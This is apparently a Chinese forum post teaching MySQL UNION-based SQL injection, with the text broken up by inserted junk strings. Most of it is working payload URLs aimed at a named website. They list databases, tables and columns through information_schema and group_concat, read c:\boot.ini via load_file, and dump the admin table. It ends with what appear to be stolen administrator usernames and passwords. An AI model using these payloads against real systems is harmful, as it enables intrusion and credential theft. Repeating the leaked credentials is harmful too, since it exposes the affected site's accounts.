此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似 C( }' q3 g) s2 [
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人- ]1 i7 ] a: M3 X8 Z
' I: \/ |8 k; M) U& u
" _% F' K4 |/ `! p4 _5 f8 }& K优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
, @& H# _6 U: F; i) ]( b% @6 I% g# X5 K; T) v, a9 T. _8 ?1 [) p6 W
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...8 P; z" S0 \/ y" }3 M6 R. m) J
; s5 G" a6 @, s/ V' [" }. \下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示. E% f) j& k( i9 g) |
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等$ T: D( Z* f: H* p( c, `# q
$ I" A& a* j+ U M/ M$ r# ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
p4 q# F5 Q6 F1 n* S9 j1 Q4 m$ r P3 |3 J6 i! Z" a( A: c* F
读出所有库:
" L# r: A9 q; ?2 U; ^' K- Dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
) b9 R! Q0 h' _5 U9 K( c: Q* V7 s# u- a" K. P5 l h7 ?' K
; J9 z$ r$ p8 p) n7 D2 D
) j, h& ^9 |' {7 X2 q读出所有表:
' w" c3 r% s/ @7 B0 [! g9 @http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()5 B/ @8 g. R5 Y" @1 A3 b
3 _; E& L! t+ a, ^& L* c3 N读出所有表字段:
- a5 E3 R' X1 a9 whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)0 d+ I ^7 p$ B, Q1 L/ P$ K! Y
*/ (97,100,109,105,110)为admin的ascii码 依次类推) _) u" m# F, {" p% h9 X; J' L1 m
9 @; k( p1 \- Y% {% _
读出所有表字段里的内容:
" ?; s# B" g( f" shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
( w# _) ]4 N8 x9 d7 F& ?8 j/ f7 G1 y( e/ B& K. J) D' }
% H0 E# m8 s$ c- c% |4 l
, o2 x) m' H% ~ c& ~4 j! n1 g! D- Q, E1 [) Y
1 h+ w; a: Z5 e
4 _' \: u! E) E# R# N* N3 khttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23& o# R' _" w; R+ Y
6 r, t2 h) N( I
# q0 ^. {& ]1 T% g4 A! @http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23$ b' ] _" |& t. v. c- {! G
9 d: `' u9 ~: Y, N9 G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23 \; W: M. x1 W/ O0 U8 H: Z
$ V/ w2 @, m7 F) S/ @. |( w$ @6 ~: ^4 S4 G) [" R7 s9 G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
3 G" P2 u7 t2 H, {8 w# a
" C- l& z9 Z b4 }; w R; d$ O& X: M1 x4 b' \4 I# x" N9 ]
webmaster:dzb521123,simlab:simadmin20043233( ?* Z' Y! C- ~ K8 X8 Y T
|